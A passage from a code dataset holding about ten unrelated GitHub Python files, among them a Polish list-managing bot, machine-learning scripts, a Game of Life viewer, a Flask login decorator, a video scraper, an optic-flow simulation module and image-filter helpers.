f2.readline()\n f2.close()\n print(line1)\n message = \"Nie znalazłem takiej listy więc już ją tworzę!\"\n if line1 == 'p\\n':\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p + '\\n')\n f2.close()\n else:\n with open(\"data/\"+dire+\"/main.txt\", 'a') as f2:\n if p == \"main\":\n pass\n else:\n f2.write(p+'\\n')\n f2.close()\n return message\n\n\ndef copy_list(dire, p, c):\n if p is None or c is None:\n message = \"Nie podano mi wystarczająco argumentów!\"\n return message\n a = checklist(dire, p)[1]\n z = checklist(dire, c)[1]\n if a == 2 or z == 2:\n message = checklist(dire, p)[0]\n return message\n if z == 0:\n message = \"Lista podana jako nowa nazwa już istnieje jako lista!\"\n return message\n if a == 0:\n with open(\"data/\"+dire+\"/\"+p+'.txt', 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\"+dire+\"/\"+c+'.txt', 'a') as f2:\n for i in lines1:\n f2.write(i)\n f2.close()\n message = \"Skopiowałem listę \"+p+\" do \"+c+\"!\"\n return message\n else:\n message = \"Nie mogę skopiować listy która nie istnieje!\"\n return message\n\n\ndef remove_list(dire, p):\n if p is None:\n message = \"Nie podano mi którą listę usunąć!\"\n return message\n a = checklist(dire, p)[1]\n if a == 2:\n message = checklist(dire, p)[0]\n return message\n if a == 0:\n os.remove(\"data/\"+dire+\"/\"+p+'.txt')\n message = \"Usunąłem listę \"+p+\"!\"\n with open(\"data/\" + dire + \"/main.txt\", 'r') as f1:\n lines1 = f1.readlines()\n f1.close()\n with open(\"data/\" + dire + \"/main.txt\", 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if title != p+\"\\n\":\n f2.write(title)\n f2.close()\n else:\n message = \"Nie ma takiej listy!\"\n return message\n\n\ndef get_list(name):\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n return lines1\n\n\ndef parse_multiple_into_one(amount, li):\n onemes = \"List:\\n\"\n for i in range(amount):\n if i > 9:\n onemes += (str(i + 1) + \". \" + li[i])\n else:\n onemes += (str(i + 1) + \". \" + li[i])\n return onemes\n\n\ndef add_to_list(name, addon):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n f1.close()\n if lines1[0] == \"p\\n\":\n with open(name + '.txt', 'w') as f1:\n f1.write(addon+'\\n')\n f1.close()\n else:\n with open(name + '.txt', 'a') as f1:\n f1.write(addon+'\\n')\n f1.close()\n\n\ndef remove_from_list(name, line):\n name = name.lower()\n with open(name + '.txt') as f1:\n lines1 = f1.readlines()\n print(len(lines1))\n f1.close()\n if int(line) > len(lines1):\n message = \"Lista ma tylko \"+str(len(lines1))+\" wpisów!\"\n return message\n with open(name + '.txt', 'w') as f2:\n for index, title in enumerate(lines1, start=1):\n if index != int(line):\n f2.write(title)\n f2.close()\n message = \"Usunięto wpis!\"\n return message\n","repo_name":"Sedarius-1/Wahabot","sub_path":"fad.py","file_name":"fad.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16758367422","text":"#-*- coding: utf-8 -*-\n#构建并测试CART决策树模型\n\nimport pandas as pd #导入数据分析库\n\n\nquchu = u'F:/data/去除第一次样本集.csv'\nzengrong = u'F:/data/1.csv'\njianrong = u'F:/data/2.csv'\njianronghuifu = u'F:/data/3.csv'\nzanting = u'F:/data/4.csv'\nzantinghuifu = u'F:/data/5.csv'\ndata = pd.read_csv(zanting,encoding='gbk') #读取数据,数据的前三列是特征,第四列是标签\ndeal = {u'年初':1,u'年中':2,u'年末':3}\ndata[u'阶段'] = data[u'阶段'].map(lambda x : deal[x])\ntrain = data[data[u'申请执行月'] < 201602][u'是否容量变更']\ntest = data[data[u'申请执行月'] > 201602][u'是否容量变更']\ntest = test.tolist()\ntrain = train.tolist()\n# data = (data - data.mean(axis=0)) / (data.std(axis=0))\ntrain_data = data[data[u'申请执行月'] < 201602]\ntest_data = data[data[u'申请执行月'] > 201602]\ndel train_data[u'申请执行月']\ndel test_data[u'申请执行月']\ntrain_data = train_data.as_matrix()\ntest_data = test_data.as_matrix()\ntrain_data = (train_data - train_data.mean(axis=0)) / (train_data.std(axis=0))\ntest_data = (test_data - test_data.mean(axis=0)) / (test_data.std(axis=0))\n\n\n#构建CART决策树模型\nfrom sklearn.tree import DecisionTreeClassifier #导入决策树模型\n\ntree = DecisionTreeClassifier() #建立决策树模型\ntree.fit(train_data[:,:2], train) #训练\n\n#保存模型\n# from sklearn.externals import joblib\n# joblib.dump(tree, treefile)\n\nfrom prediction.cm_plot import * #导入自行编写的混淆矩阵可视化函数\ncm_plot(test, tree.predict(test_data[:,:2])).show() #显示混淆矩阵可视化结果\n#注意到Scikit-Learn使用predict方法直接给出预测结果。\n\nfrom sklearn.metrics import roc_curve #导入ROC曲线函数\nimport matplotlib.pyplot as plt\nfpr, tpr, thresholds = roc_curve(test, tree.predict_proba(test_data[:,:2])[:,1], pos_label=1)\nplt.plot(fpr, tpr, linewidth=2, label = 'ROC of CART', color = 'green') #作出ROC曲线\nplt.xlabel('False Positive Rate') #坐标轴标签\nplt.ylabel('True Positive Rate') #坐标轴标签\nplt.ylim(0,1.05) #边界范围\nplt.xlim(0,1.05) #边界范围\nplt.legend(loc=4) #图例\nplt.show() #显示作图结果","repo_name":"braveld/PythonProgram","sub_path":"after_classified/decision_tree_yongdian.py","file_name":"decision_tree_yongdian.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"14731021857","text":"import hashlib\nimport random\nimport string\nimport time\nimport uuid\n\n\ndef gen_uuid():\n return str(uuid.uuid1())\n\n\ndef gen_id(node_type=''):\n if node_type == 'UNKNOWN':\n return None\n\n s = ''.join(random.sample(string.ascii_lowercase, 10))\n t = ''.join([s, random_date(), gen_uuid()])\n m = hashlib.md5()\n m.update(bytes(str(t)))\n ran_id = m.hexdigest()\n return ''.join([node_type, ran_id])\n\n\ndef random_date():\n a1 = (2000, 1, 1, 0, 0, 0, 0, 0, 0)\n a2 = (2018, 12, 31, 23, 59, 59, 0, 0, 0)\n\n start = time.mktime(a1)\n end = time.mktime(a2)\n\n t = random.randint(start, end)\n date_tuple = time.localtime(t)\n date = time.strftime(\"%Y-%m-%d\", date_tuple)\n return date\n\n\ndef random_int():\n return random.randint(10000, 10000000)\n\n\ndef random_index(rate):\n start = 0\n index = 0\n rand_num = random.randint(1, sum(rate))\n\n for index, scope in enumerate(rate):\n start += scope\n if rand_num <= start:\n break\n return index\n","repo_name":"jimxiang/knowledgemap","sub_path":"guarantee_relation/util/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36059604305","text":"import pygame\nimport sys\nimport time\n\nfrom game import step\nfrom game import print_grid\nfrom game import insert_life\nfrom game import BASE\nfrom game import create_grid\nfrom game import ALIVE, DEAD\n\n\nclass Rectangle(pygame.sprite.Sprite):\n def __init__(self, pos_x, pos_y):\n super().__init__()\n self.image = pygame.Surface([100, 100])\n self.image.fill((0, 0, 0))\n self.rect = self.image.get_rect()\n self.rect.topleft = [pos_x, pos_y]\n\n\n# Grid Setup\ngrid = create_grid()\nl1 = [15, 26, 34, 35, 36]\ninsert_life(grid, l1)\n# grid = play(grid)\nprint_grid(grid, BASE)\n\n# General Setup\npygame.init()\nclock = pygame.time.Clock()\n\n# Game Screen\nscreen_width = 1000\nscreen_height = 1000\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Sprite Animation\")\n\n# Creating the sprites and groups\nmoving_sprites = pygame.sprite.Group()\n\n\ndef pygame_step(grid, moving_sprites):\n moving_sprites.empty()\n for i in range(100):\n if grid[i] == ALIVE:\n j = i % BASE\n rectangle_tmp = Rectangle(j * BASE * BASE, (i-j) * BASE)\n moving_sprites.add(rectangle_tmp)\n print(i)\n print(j, \" \", i-j)\n print()\n\n\n# mainloop\n\"\"\"i = 0\nj = 0\"\"\"\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n \"\"\"rectangle1.rect.topleft = [i, j*10]\n i += 1\n if i % 1000 == 0:\n i = 0\n j += 1\n print(i)\"\"\"\n\n pygame_step(grid, moving_sprites)\n grid = step(grid)\n\n screen.fill((0, 255, 255))\n moving_sprites.draw(screen)\n pygame.display.flip()\n\n # clock.tick(1000000)\n time.sleep(0.5)","repo_name":"lilAndy-bruh/Game_of_Life","sub_path":"pygame_intro.py","file_name":"pygame_intro.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33035751096","text":"# 定义索引转换过滤器(如果使用装饰器的方法定义过滤器,这里先得使用current_app进行关联,init文件中也要声明这个装饰器,相比很麻烦)\nimport functools\n\nfrom flask import session, current_app, g\n\nfrom Info.models import User\n\n\ndef index_convert(index):\n index_dict = {\n 1: \"first\",\n 2: \"second\",\n 3: \"third\"\n }\n return index_dict.get(index, \"\")\n\n\n\n# 查询用户登陆状态\ndef user_login_data(f):\n @functools.wraps(f) # 可以让闭包函数wrapper使用指定函数f的函数信息(如函数名__name__,文档注释__doc__)\n def wrapper(*args, **kwargs):\n # 判断用户是否登陆\n user_id = session.get(\"user_id\")\n user = None # 当某些极端情况下,user_id没有值,这样从库里就取不出数据,但是模板渲染里仍要传值,这时需要相当于对user进行初始化\n if user_id:\n # 根据user_id查询用户模型\n try:\n user = User.query.get(user_id)\n except Exception as e:\n current_app.logger.error(e)\n\n # user = user.to_dict() if user else None # 因为这里只是用于验证用户是否登陆,不需要对user里的取值进行格式化\n\n g.user = user # 让g变量记录查询出的用户数据\n\n # 再执行原有的功能\n return f(*args, **kwargs)\n\n return wrapper\n","repo_name":"CcLmL/InfoNews","sub_path":"Info/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73613993707","text":"from bs4 import BeautifulSoup\nimport re\nfrom urllib.request import Request, urlopen\nimport youtube_dl\n\ndef getWSHlinks(page):\n req = Request(page, headers={'User-Agent': 'Mozilla/5.0'})\n html_page = urlopen(req).read()\n\n soup = BeautifulSoup(html_page, 'html.parser')\n\n soup.body.find_all(\"time\")\n\n\n results = soup.find_all('a', attrs={\"class\":\"video-box\"})\n\n hrefs = []\n for x in results:\n #print(x.get('href'))\n hrefs.append(x.get('href'))\n return hrefs\n\nweekLongVidRefs = getWSHlinks(\"https://worldstarhiphop.com/videos/\")\nweekLongVidRefs.extend(getWSHlinks(\"https://worldstarhiphop.com/videos/?start=2\"))\n\nydl_opts = {}\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download(weekLongVidRefs)\nprint(len(weekLongVidRefs))\n","repo_name":"human3rr/scrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2469821788","text":"\"\"\"\n给你一个整数 n ,对于 0 <= i <= n 中的每个 i ,计算其二进制表示中 1 的个数 ,返回一个长度为 n + 1 的数组 ans 作为答案。\n\neg1:\n输入:n = 2\n输出:[0,1,1]\n解释:\n0 --> 0\n1 --> 1\n2 --> 10\n\neg2:\n输入:n = 5\n输出:[0,1,1,2,1,2]\n解释:\n0 --> 0\n1 --> 1\n2 --> 10\n3 --> 11\n4 --> 100\n5 --> 101\n\n\"\"\"\nfrom typing import Optional, List\n\n\nclass Solution:\n def countBits(self, n: int) -> List[int]:\n bits = [0]\n high_bit = 0\n for i in range(1, n + 1):\n # 如果是1bit数,更新high_bit\n if i & (i - 1) == 0:\n high_bit = i\n # i 比 i - high_bit 多一个1bit位\n bits.append(bits[i - high_bit] + 1)\n return bits\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.countBits(5))\n","repo_name":"TQQ615/leetcode","sub_path":"数组及其他/比特位计数.py","file_name":"比特位计数.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"18868997744","text":"# imports\nimport json\nfrom transformers import PegasusForConditionalGeneration, PegasusTokenizer\nfrom argparse import ArgumentParser\nimport pytorch_lightning as pl\nimport torch\n\n\nclass PegasusLightning(pl.LightningModule):\n # Instantiate the model\n def __init__(self, model):\n super().__init__()\n self.model = model\n\n # Do a forward pass through the model\n def forward(self, input_ids, **kwargs):\n return self.model(input_ids, **kwargs)\n\n def generate(self, text, eval_beams, early_stopping=True, max_len=64):\n ''' Function to generate text '''\n generated_ids = self.model.generate(\n text[\"input_ids\"],\n attention_mask=text[\"attention_mask\"],\n use_cache=True,\n num_beams=eval_beams,\n max_length=max_len,\n early_stopping=early_stopping,\n\n )\n return generated_ids\n\n def save_model(self, save_path):\n self.tokenizer.save_pretrained(save_path)\n self.model.save_pretrained(save_path)\n\n# -----------------------------------------------------------------------------------\n\n\ndef generate_(text, model_, tokenizer_):\n # Put the model on eval mode\n\n tokens = tokenizer_(text, padding='max_length',\n return_tensors=\"pt\", truncation=True, src_lang=\"de_DE\").to(\"cuda\")\n summary_ids = model_.generate_(\n tokens, eval_beams=4)\n with tokenizer_.as_target_tokenizer():\n output = ([tokenizer_.decode(g, skip_special_tokens=True,\n clean_up_tokenization_spaces=True, tgt_lang=\"de_DE\") for g in summary_ids])\n return output[0]\n\n\ndef summarize(text, model, tokenizer):\n output = generate_(text, model_=model, tokenizer_=tokenizer)\n return output\n\n\ndef array_to_string(array):\n text = \"\"\n for ele in array:\n text += ele + \" \"\n text = text.replace(\"\\n\", \"\").replace(\"\\r\", \"\")\n return text\n\n\ndef run(checkpoint_path, test_file, output_file, model_id):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n print(f\"Device is set to {device}\")\n\n tokenizer = PegasusTokenizer.from_pretrained(\n model_id)\n\n pegasus_model = PegasusForConditionalGeneration.from_pretrained(\n model_id)\n\n model = PegasusLightning.load_from_checkpoint(\n checkpoint_path=checkpoint_path, strict=False, tokenizer=tokenizer, model=pegasus_model)\n\n model.to(torch.device('cuda'))\n model.eval()\n\n print(\"Starting GENERATION\")\n\n # ---------Variable to be set:\n file_path = test_file\n output_file_path = output_file\n # --------------------------\n file = open(file_path, \"r\", encoding=\"utf-8\")\n output = open(output_file_path, \"a\", encoding=\"utf-8\")\n lines = file.readlines()\n for i in range(len(lines)):\n data = json.loads(lines[i])\n result = summarize(array_to_string(\n data[\"source\"]), model=model, tokenizer=tokenizer)\n print(str(result))\n output.write(str(result) + \" \\n\")\n print(f\"Processed TLDR #{i} from total {len(lines)} TLDRs\")\n output.close()\n file.close()\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n # Required parameters\n parser.add_argument(\"--checkpoint_path\", type=str,\n help=\"Path of the checkpoint file to be used.\")\n parser.add_argument(\"--test_file\", type=str,\n help=\"Path to the test file containing the documents.\")\n parser.add_argument(\"--output_file\", type=str,\n help=\"File to save generated summaries in.\")\n parser.add_argument(\"--model-id\", type=str, required=False, default=\"google/pegasus-large\",\n help=\"Exact PEGASUS model checkpoint from huggingface to initialize the model.\")\n\n args = parser.parse_args()\n run(args.checkpoint_path, args.test_file,\n args.output_file, args.model_id)\n","repo_name":"nfriedri/CLS-Platform","sub_path":"backend/scripts/pegasus_lightning_model.py","file_name":"pegasus_lightning_model.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"4132645126","text":"from .utils_model import *\nfrom torch.utils.data.dataset import Dataset\nfrom analysis.opticflow import ROFL, HyperFlow\n\n\n# noinspection PyUnresolvedReferences\nclass ROFLDS(Dataset):\n\tdef __init__(\n\t\t\tself,\n\t\t\tpath: str,\n\t\t\tmode: str,\n\t\t\tdevice: torch.device = None,\n\t):\n\t\t# category & n_obj\n\t\tsim = path.split('/')[-1].split('_')[0]\n\t\tself.category = sim[:-1]\n\t\tself.n_obj = int(sim[-1])\n\t\t# attributes\n\t\tself.attrs = np.load(\n\t\t\tpjoin(path, 'attrs.npy'),\n\t\t\tallow_pickle=True,\n\t\t).item()\n\t\tself.f = self.attrs.pop('f')\n\t\tself.f_aux = self.attrs.pop('f_aux')\n\t\t# mode = trn/vld/tst\n\t\tpath = pjoin(path, mode)\n\t\tkws = dict(mmap_mode='r')\n\t\t# generative factors\n\t\tself.g = np.load(pjoin(path, 'g.npy'), **kws)\n\t\tself.g_aux = np.load(pjoin(path, 'g_aux.npy'), **kws)\n\t\t# data & norm\n\t\tself.x = np.load(pjoin(path, 'x.npy'), **kws)\n\t\tself.norm = np.load(pjoin(path, 'norm.npy'), **kws)\n\t\tif device is not None:\n\t\t\tself.x = torch.tensor(\n\t\t\t\tdata=self.x,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\t\tself.norm = torch.tensor(\n\t\t\t\tdata=self.norm,\n\t\t\t\tdevice=device,\n\t\t\t\tdtype=torch.float,\n\t\t\t)\n\t\tif self.category == 'obj':\n\t\t\tself.transform = _shift_mu\n\t\telse:\n\t\t\tself.transform = None\n\n\tdef __len__(self):\n\t\treturn len(self.x)\n\n\tdef __getitem__(self, i):\n\t\tif self.transform is not None:\n\t\t\tx = self.transform(self.x[i])\n\t\telse:\n\t\t\tx = self.x[i]\n\t\treturn x, self.norm[i]\n\n\ndef _shift_mu(x):\n\treturn x - torch.mean(x)\n\n\ndef generate_simulation(\n\t\tcategory: str,\n\t\tn_obj: int,\n\t\ttotal: int,\n\t\tkwargs: dict,\n\t\taccept_n: dict,\n\t\tmin_obj_size: int,\n\t\tdtype='float32', ):\n\tkws = kwargs.copy()\n\tkws['category'] = category\n\tkws['n_obj'] = n_obj\n\tkws['seed'] = 0\n\n\tshape = (total, kws['dim'], kws['dim'], 2)\n\talpha_dot = np.empty(shape, dtype=dtype)\n\tg_all, g_aux_all = [], []\n\n\tcnt = 0\n\twhile True:\n\t\t# generate\n\t\tof = ROFL(**kws).compute_coords()\n\t\t_ = of.compute_flow()\n\t\t# accept\n\t\taccept = of.filter(\n\t\t\tmin_obj_size=min_obj_size,\n\t\t\tmin_n_obj=accept_n[n_obj],\n\t\t)\n\t\tf, g, f_aux, g_aux = of.groundtruth_factors()\n\t\tind = range(cnt, min(cnt + accept.sum(), total))\n\t\talpha_dot[ind] = of.alpha_dot[accept][:len(ind)].astype(dtype)\n\t\tg_aux_all.append(g_aux[accept])\n\t\tg_all.append(g[accept])\n\t\tcnt += accept.sum()\n\t\tif cnt >= total:\n\t\t\tbreak\n\t\tkws['seed'] += 1\n\n\talpha_dot = np.transpose(alpha_dot, (0, -1, 1, 2))\n\tg_all, g_aux_all = cat_map([g_all, g_aux_all], axis=0)\n\tg_all, g_aux_all = g_all[:, :total], g_aux_all[:, :total]\n\n\tattrs = {\n\t\t'f': f,\n\t\t'f_aux': f_aux,\n\t\t'category': of.category,\n\t\t'n_obj': of.n_obj,\n\t\t'dim': of.dim,\n\t\t'fov': of.fov,\n\t\t'res': of.res,\n\t\t'z_bg': of.z_bg,\n\t\t'obj_r': of.obj_r,\n\t\t'obj_bound': of.obj_bound,\n\t\t'obj_zlim': of.obj_zlim,\n\t\t'vlim_obj': of.vlim_obj,\n\t\t'vlim_slf': of.vlim_slf,\n\t\t'residual': of.residual,\n\t\t'seeds': range(kws['seed'] + 1),\n\t}\n\treturn alpha_dot, g_all, g_aux_all, attrs\n\n\ndef save_simulation(\n\t\tsave_dir: str,\n\t\tx: np.ndarray,\n\t\tg: np.ndarray,\n\t\tg_aux: np.ndarray,\n\t\tattrs: dict,\n\t\tsplit: dict = None, ):\n\tn = len(x)\n\tname = '_'.join([\n\t\tf\"{attrs['category']}{attrs['n_obj']}\",\n\t\tf\"dim-{attrs['dim']}\",\n\t\tf\"n-{n//1000}k\",\n\t])\n\tpath = pjoin(save_dir, name)\n\tos.makedirs(path, exist_ok=True)\n\t# save attrs\n\tsave_obj(\n\t\tobj=attrs,\n\t\tsave_dir=path,\n\t\tfile_name='attrs',\n\t\tverbose=False,\n\t\tmode='npy',\n\t)\n\t# save data\n\tsplit = split if split else {\n\t\t'trn': int(0.8 * n),\n\t\t'vld': int(0.1 * n),\n\t\t'tst': int(0.1 * n),\n\t}\n\tassert sum(split.values()) == n\n\ti = 0\n\tsplit_ids = {}\n\tfor k, v in split.items():\n\t\tsplit_ids[k] = range(i, i + v)\n\t\ti += v\n\tfor a, b in itertools.combinations(split_ids.values(), 2):\n\t\tassert not set(a).intersection(b)\n\n\tfor lbl, ids in split_ids.items():\n\t\t_path = pjoin(path, lbl)\n\t\tos.makedirs(_path, exist_ok=True)\n\t\tkws = dict(\n\t\t\tsave_dir=_path,\n\t\t\tverbose=False,\n\t\t\tmode='npy',\n\t\t)\n\t\t# generative factors\n\t\tkws['obj'] = g[ids]\n\t\tkws['file_name'] = 'g'\n\t\tsave_obj(**kws)\n\t\t# generative factors (aux)\n\t\tkws['obj'] = g_aux[ids]\n\t\tkws['file_name'] = 'g_aux'\n\t\tsave_obj(**kws)\n\t\t# flow frames\n\t\tkws['obj'] = x[ids]\n\t\tkws['file_name'] = 'x'\n\t\tsave_obj(**kws)\n\t\t# norm\n\t\tkws['obj'] = np.sum(sp_lin.norm(\n\t\t\tx[ids], axis=1), axis=(1, 2))\n\t\tkws['file_name'] = 'norm'\n\t\tsave_obj(**kws)\n\treturn\n\n\ndef load_ephys(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict = None,\n\t\trescale: float = 2.0,\n\t\tdtype: str = 'float32', ):\n\tkws_hf = kws_hf if kws_hf else {\n\t\t'dim': 17, 'apply_mask': True}\n\tkws_hf['fov'] = group.attrs.get(\n\t\t'designsize', 30.0) / 2\n\tdiameter = np.array(group['hf_diameter'])\n\t# inconsistent diameters throughout the expt?\n\tif len(set(group.attrs.get('diameter'))) != 1:\n\t\tif 'hf_diameterR' in group:\n\t\t\tdiameter = np.concatenate([\n\t\t\t\tdiameter,\n\t\t\t\tnp.array(group['hf_diameterR']),\n\t\t\t])\n\t\tdiameter = diameter.mean()\n\t\tdiameter_r = diameter\n\telse:\n\t\tdiameter_r = None\n\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_params']),\n\t\tcenter=np.array(group['hf_center']),\n\t\tdiameter=diameter,\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow(dtype=dtype)\n\tspks = np.array(group['spks'], dtype=float)\n\tif 'badspks' in group:\n\t\tmask = ~np.array(group['badspks'], dtype=bool)\n\telse:\n\t\tmask = np.ones(len(spks), dtype=bool)\n\tstim_r, spks_r, good_r = setup_repeat_data(\n\t\tgroup=group,\n\t\tkws_hf=kws_hf,\n\t\tdiameter=diameter_r,\n\t)\n\n\tif rescale is not None:\n\t\tstim_scale = np.max(np.abs(stim))\n\t\tstim *= rescale / stim_scale\n\t\tif stim_r is not None:\n\t\t\tstim_r *= rescale / stim_scale\n\n\treturn stim, spks, mask, stim_r, spks_r, good_r\n\n\ndef setup_repeat_data(\n\t\tgroup: h5py.Group,\n\t\tkws_hf: dict,\n\t\tdiameter: float = None, ):\n\tif not group.attrs.get('has_repeats'):\n\t\treturn None, None, None\n\n\tpsth = np.array(group['psth_raw_all'], dtype=float)\n\tbadspks = np.array(group['fix_lost_all'], dtype=bool)\n\ttstart = np.array(group['tind_start_all'], dtype=int)\n\tassert (tstart == tstart[0]).all()\n\ttstart = tstart[0]\n\tnc, _, length = psth.shape\n\tintvl = range(tstart[1], tstart[1] + length)\n\n\t# stim\n\thf = HyperFlow(\n\t\tparams=np.array(group['hf_paramsR']),\n\t\tcenter=np.array(group['hf_centerR']),\n\t\tdiameter=diameter if diameter else\n\t\tnp.array(group['hf_diameterR']),\n\t\t**kws_hf,\n\t)\n\tstim = hf.compute_hyperflow()\n\tstim = stim[range(intvl.stop)]\n\tintvl = np.array(intvl)\n\n\t# spks\n\t_spks = np.array(group['spksR'], dtype=float)\n\tspks = np_nans(psth.shape)\n\tfor i in range(nc):\n\t\tfor trial, t in enumerate(tstart):\n\t\t\ts_ = range(t, t + length)\n\t\t\tspks[i][trial] = _spks[:, i][s_]\n\tspks[badspks] = np.nan\n\n\treturn stim, spks, intvl\n\n\ndef setup_supervised_data(\n\t\tlags: int,\n\t\tgood: np.ndarray,\n\t\tstim: np.ndarray,\n\t\tspks: np.ndarray, ):\n\tassert len(stim) == len(spks), \"must have same nt\"\n\tidxs = good.copy()\n\tidxs = idxs[idxs > lags]\n\tsrc = time_embed(stim, lags, idxs)\n\ttgt = spks[idxs]\n\tassert len(src) == len(tgt), \"must have same length\"\n\treturn src, tgt\n\n\ndef time_embed(x, lags, idxs=None):\n\tassert len(x) > lags\n\tif idxs is None:\n\t\tidxs = range(lags, len(x))\n\tx_emb = []\n\tfor t in idxs:\n\t\tx_emb.append(np.expand_dims(\n\t\t\tx[t - lags: t], axis=0))\n\treturn np.concatenate(x_emb)\n\n\ndef simulation_combos():\n\tcombos = [('fixate', i) for i in [0, 1]]\n\tcombos += [('transl', i) for i in [0, 1]]\n\tcombos += [('obj', i) for i in [1]]\n\treturn combos\n\n\ndef _setup_args() -> argparse.Namespace:\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument(\n\t\t\"n_tot\",\n\t\thelp='# frames total',\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--n_batch\",\n\t\thelp='# frames per batch',\n\t\tdefault=int(5e4),\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--dim\",\n\t\thelp='dimensionality',\n\t\tdefault=33,\n\t\ttype=int,\n\t)\n\tparser.add_argument(\n\t\t\"--min_obj_size\",\n\t\thelp='minimum acceptable object size',\n\t\tdefault=10.5,\n\t\ttype=float,\n\t)\n\tparser.add_argument(\n\t\t\"--dtype\",\n\t\thelp='dtype for alpha_dot',\n\t\tdefault='float32',\n\t\ttype=str,\n\t)\n\treturn parser.parse_args()\n\n\ndef _main():\n\targs = _setup_args()\n\tprint(args)\n\n\tkws = dict(\n\t\tn=args.n_batch,\n\t\tdim=args.dim,\n\t\tfov=45.0,\n\t\tobj_r=0.25,\n\t\tobj_bound=1.0,\n\t\tobj_zlim=(0.5, 1.0),\n\t\tvlim_obj=(0.01, 1.0),\n\t\tvlim_slf=(0.01, 1.0),\n\t\tresidual=False,\n\t\tz_bg=1.0,\n\t\tseed=0,\n\t)\n\taccept_n = {\n\t\t0: None,\n\t\t1: None,\n\t\t2: 1,\n\t\t4: 3,\n\t\t8: 5,\n\t}\n\tsave_dir = '/home/hadi/Documents/MTVAE/data'\n\tcombos = simulation_combos()\n\tprint(f\"Simulation combos:\\n{combos}\")\n\tpbar = tqdm(combos)\n\tfor category, n_obj in pbar:\n\t\tpbar.set_description(f\"creating {category}{n_obj}\")\n\t\talpha_dot, g, g_aux, attrs = generate_simulation(\n\t\t\ttotal=args.n_tot,\n\t\t\tcategory=category,\n\t\t\tn_obj=n_obj,\n\t\t\tkwargs=kws,\n\t\t\taccept_n=accept_n,\n\t\t\tmin_obj_size=args.min_obj_size,\n\t\t\tdtype=args.dtype,\n\t\t)\n\t\tsave_simulation(\n\t\t\tsave_dir=save_dir,\n\t\t\tx=alpha_dot,\n\t\t\tg=g,\n\t\t\tg_aux=g_aux,\n\t\t\tattrs=attrs,\n\t\t)\n\tprint(f\"\\n[PROGRESS] saving datasets done ({now(True)}).\\n\")\n\treturn\n\n\nif __name__ == \"__main__\":\n\t_main()\n","repo_name":"hadivafaii/_MTMST","sub_path":"base/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19962157329","text":"from plot_deconvolution import Lucy_Restoration\nfrom PIL import Image, ImageFilter, ImageOps\nfrom PIL.ImageFilter import (\n BLUR, CONTOUR, EDGE_ENHANCE, EDGE_ENHANCE_MORE,\n EMBOSS, FIND_EDGES, SHARPEN\n)\n\nimport numpy as np\n\ndef sharpenPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(SHARPEN)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef blurPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(BLUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef rotateCounter(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(90).save('image' + str(counter) + '.jpg')\n\n\ndef rotateClock(curImg, counter):\n newImg = Image.open(curImg)\n newImg.rotate(270).save('image' + str(counter) + '.jpg')\n\n\ndef cropPic(curImg, counter):\n current = Image.open(curImg)\n width, height = current.size\n left = width / 4\n top = height / 4\n right = 3 * width / 4\n bottom = 3 * height / 4\n newImg = current.crop((left, top, right, bottom))\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef sketchPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(CONTOUR)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef oilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef pencilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EDGE_ENHANCE_MORE)\n newImg.save('image' + str(counter) + '.jpg')\n\n\ndef foilPic(curImg, counter):\n current = Image.open(curImg)\n newImg = current.filter(EMBOSS)\n 